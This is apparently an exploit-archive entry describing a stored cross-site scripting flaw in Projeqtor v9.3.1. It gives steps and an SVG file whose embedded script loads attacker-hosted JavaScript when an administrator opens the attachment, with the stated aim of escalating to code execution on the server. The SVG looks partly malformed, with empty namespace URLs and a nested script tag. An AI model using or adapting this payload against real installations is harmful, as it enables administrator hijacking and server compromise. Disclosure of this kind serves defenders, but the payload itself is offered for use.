Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)

ID: 105073
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: January 4, 2021
# Vendor Homepage:
# Software Link:
# Tested on: Ubuntu, LAAMP
# Vendor: Projeqtor
# Version: v9.3.1

# Exploit Description:
Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.

# Steps to reproduce:
Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="" xmlns:xlink="">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script xlink:href="<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script>
1-4-2 (www01)